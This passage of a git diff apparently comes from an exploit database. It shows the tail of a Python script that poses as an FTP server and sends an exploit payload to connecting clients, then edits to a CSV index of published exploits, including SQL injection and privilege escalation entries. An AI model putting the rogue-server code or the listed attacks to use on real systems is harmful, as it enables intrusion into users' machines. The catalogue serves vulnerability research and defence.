+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.bind((host, port))
+    sock.listen(20)
+    print("[*] server listening on %s:%d") % (host, port)
+except:
+    print("[-] failed to bind the server exiting...")
+    exit()
+
+while True:
+    conn, addr = sock.accept()
+    print("[*] connection from %s:%d") % (addr[0], addr[1])
+    print("[+] sending %d bytes to target host" % (len(buffer)))
+    conn.send('220 Welcome Serv-U FTP Server v6.0 for WinSock ready...\r\n')
+    conn.recv(1024)
+    conn.send('331 OK\r\n')
+    conn.recv(1024)
+    conn.send('230 OK\r\n')
+    conn.recv(1024)
+    conn.send(payload)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9775c8c6a..503f819c1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5350,9 +5350,9 @@ id,file,description,date,author,type,platform,port
 40948,exploits/windows/dos/40948.html,"Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)",2016-12-21,"Google Security Research",dos,windows,
 40952,exploits/macos/dos/40952.c,"Apple macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution",2016-12-22,"Google Security Research",dos,macos,
 40954,exploits/macos/dos/40954.c,"Apple macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free",2016-12-22,"Google Security Research",dos,macos,
-40955,exploits/multiple/dos/40955.txt,"macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free",2016-12-22,"Google Security Research",dos,multiple,
-40958,exploits/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",dos,multiple,
-40959,exploits/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",dos,multiple,
+40955,exploits/multiple/dos/40955.txt,"Apple macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free",2016-12-22,"Google Security Research",dos,multiple,
+40958,exploits/multiple/dos/40958.c,"Apple macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",dos,multiple,
+40959,exploits/multiple/dos/40959.c,"Apple macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",dos,multiple,
 40964,exploits/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,dos,windows,
 40965,exploits/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",dos,windows,
 40985,exploits/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,dos,linux,
@@ -5368,9 +5368,9 @@ id,file,description,date,author,type,platform,port
 41145,exploits/multiple/dos/41145.py,"Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service",2017-01-23,ERPScan,dos,multiple,
 41160,exploits/windows/dos/41160.py,"Autodesk Backburner Manager 3 < 2016.0.0.2150 - Null Dereference Denial of Service",2017-01-26,b0nd,dos,windows,
 41161,exploits/android/dos/41161.txt,"Google Android - 'pm_qos' KASLR Bypass",2017-01-26,"Google Security Research",dos,android,
-41163,exploits/multiple/dos/41163.txt,"macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption",2017-01-26,"Google Security Research",dos,multiple,
-41164,exploits/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",dos,multiple,
-41165,exploits/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",dos,multiple,
+41163,exploits/multiple/dos/41163.txt,"Apple macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption",2017-01-26,"Google Security Research",dos,multiple,
+41164,exploits/multiple/dos/41164.c,"Apple macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",dos,multiple,
+41165,exploits/multiple/dos/41165.c,"Apple macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",dos,multiple,
 41192,exploits/multiple/dos/41192.c,"OpenSSL 1.1.0 - Remote Client Denial of Service",2017-01-26,"Guido Vranken",dos,multiple,
 41211,exploits/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' / 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",dos,android,
 41212,exploits/android/dos/41212.txt,"Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation",2017-02-01,"Google Security Research",dos,android,
@@ -5765,8 +5765,8 @@ id,file,description,date,author,type,platform,port
 43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux,
 43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows,
 43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows,
-43233,exploits/multiple/dos/43233.txt,"Wireshark 2.4.0 - 2.4.2 / 2.2.0 - 2.2.10 - CIP Safety Dissector Crash",2017-12-07,Wireshark,dos,multiple,
-43234,exploits/linux/dos/43234.c,"Linux Kernel - DCCP Socket Use-After-Free",2017-12-07,"Mohamed Ghannam",dos,linux,
+43233,exploits/multiple/dos/43233.txt,"Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash",2017-12-07,Wireshark,dos,multiple,
+43234,exploits/linux/dos/43234.c,"Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free",2017-12-07,"Mohamed Ghannam",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9163,14 +9163,14 @@ id,file,description,date,author,type,platform,port
 40902,exploits/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",local,windows,
 40903,exploits/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - Local Buffer Overflow (SEH)",2016-12-10,malwrforensics,local,windows,
 40921,exploits/linux/local/40921.sh,"Nagios < 4.2.4 - Local Privilege Escalation",2016-12-15,"Dawid Golunski",local,linux,
-40931,exploits/multiple/local/40931.txt,"iOS 10.1.1 / macOS 10.12 16A323 XNU Kernel - set_dp_control_port Lack of Locking Use-After-Free",2016-12-16,"Google Security Research",local,multiple,
+40931,exploits/multiple/local/40931.txt,"Apple iOS 10.1.1 / macOS 10.12 16A323 XNU Kernel - set_dp_control_port Lack of Locking Use-After-Free",2016-12-16,"Google Security Research",local,multiple,
 40937,exploits/linux/local/40937.txt,"Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution",2016-12-14,"Donncha OCearbhaill",local,linux,
 40938,exploits/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM' / 'RSSMON' Command Injection (Shellshock)",2016-12-18,"Hacker Fantastic",local,linux,
 40943,exploits/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",local,linux,
 40950,exploits/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Local Privilege Escalation",2016-12-22,"Hector X. Monsegur",local,aix,
 40953,exploits/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",local,linux,
 40956,exploits/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",local,macos,
-40957,exploits/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",local,macos,
+40957,exploits/macos/local/40957.c,"Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",local,macos,
 40962,exploits/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",local,linux,
 40967,exploits/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",local,windows,
 40995,exploits/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,local,windows,
@@ -9308,7 +9308,7 @@ id,file,description,date,author,type,platform,port
 42382,exploits/windows/local/42382.rb,"Microsoft Windows - '.LNK' Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",local,windows,
 42549,exploits/windows/local/42549.py,"Easy AVI DivX Converter 1.2.24 - Local Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",local,windows,
 42385,exploits/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,local,windows,
-42407,exploits/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",local,multiple,
+42407,exploits/multiple/local/42407.txt,"Apple iOS/macOS - 'xpc_data' Objects Sandbox Escape Privilege Escalation",2017-08-01,"Google Security Research",local,multiple,
 42418,exploits/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Code Execution (Metasploit)",2017-08-02,Metasploit,local,windows,
 42424,exploits/linux/local/42424.py,"DNSTracer 1.9 - Local Buffer Overflow",2017-08-03,j0lama,local,linux,
 42425,exploits/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows,
@@ -9369,7 +9369,7 @@ id,file,description,date,author,type,platform,port
 43179,exploits/windows/local/43179.py,"ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)",2017-11-25,sickness,local,windows,
 43187,exploits/windows/local/43187.txt,"Diving Log 6.0 - XML External Entity Injection",2017-11-27,"Trent Gordon",local,windows,
 43192,exploits/win_x86/local/43192.c,"Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,win_x86,
-43201,exploits/macos/local/43201.rb,"macOS High Sierra - Local Privilege Escalation (Metasploit)",2017-11-30,Metasploit,local,macos,
+43201,exploits/macos/local/43201.rb,"Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation (Metasploit)",2017-11-30,Metasploit,local,macos,
 43216,exploits/macos/local/43216.rb,"Arq 5.9.7 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
 43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
 43218,exploits/macos/local/43218.sh,"Arq 5.9.6 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
@@ -9380,6 +9380,8 @@ id,file,description,date,author,type,platform,port
 43223,exploits/macos/local/43223.sh,"Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
 43224,exploits/macos/local/43224.sh,"Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
 43225,exploits/macos/local/43225.sh,"Proxifier for Mac 2.19 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
+43247,exploits/macos/local/43247.md,"Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
+43248,exploits/macos/local/43248.md,"Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation",2017-11-28,Lemiorhan,local,macos,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote (PoC)",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16013,6 +16015,7 @@ id,file,description,date,author,type,platform,port
 43226,exploits/cgi/remote/43226.py,"LaCie 5big Network 2.2.8 - Command Injection",2017-12-07,"Timo Sablowski",remote,cgi,
 43230,exploits/unix/remote/43230.rb,"Polycom Shell HDX Series - Traceroute Command Execution (Metasploit)",2017-12-07,Metasploit,remote,unix,23
 43231,exploits/windows/remote/43231.py,"Claymore Dual ETH + DCR/SC/LBC/PASC GPU Miner - Stack Buffer Overflow / Path Traversal",2017-12-07,tintinweb,remote,windows,
+43236,exploits/windows/remote/43236.py,"LabF nfsAxe FTP Client 3.7 - Buffer Overflow (DEP Bypass)",2017-12-08,wetw0rk,remote,windows,21
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38267,3 +38270,13 @@ id,file,description,date,author,type,platform,port
 43227,exploits/php/webapps/43227.txt,"FS IMDB Clone - 'id' SQL Injection",2017-12-07,Dan°,webapps,php,
 43228,exploits/php/webapps/43228.txt,"FS Facebook Clone - 'token' SQL Injection",2017-12-07,Dan°,webapps,php,
 43232,exploits/php/webapps/43232.txt,"OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting",2017-12-07,"SEC Consult",webapps,php,80
+43235,exploits/php/webapps/43235.txt,"DomainSale PHP Script 1.0 - 'id' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
+43237,exploits/php/webapps/43237.txt,"Simple Chatting System 1.0.0 - Arbitrary File Upload",2017-12-08,"Ihsan Sencan",webapps,php,80
+43238,exploits/php/webapps/43238.txt,"Website Auction Marketplace 2.0.5 - 'cat_id' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
+43239,exploits/php/webapps/43239.txt,"Realestate Crowdfunding Script 2.7.2 - 'pid' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43240,exploits/php/webapps/43240.txt,"FS Thumbtack Clone 1.0 - 'cat' / 'sc' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
+43241,exploits/php/webapps/43241.txt,"FS Stackoverflow Clone 1.0 - 'keywords' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
+43242,exploits/php/webapps/43242.txt,"FS Shutterstock Clone 1.0 - 'keywords' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
+43243,exploits/php/webapps/43243.txt,"FS Quibids Clone 1.0 - SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
+43244,exploits/php/webapps/43244.txt,"FS Olx Clone 1.0 - 'scat' / 'pid' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
+43245,exploits/php/webapps/43245.txt,"FS Monster Clone 1.0 - 'Employer_Details.php?id' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80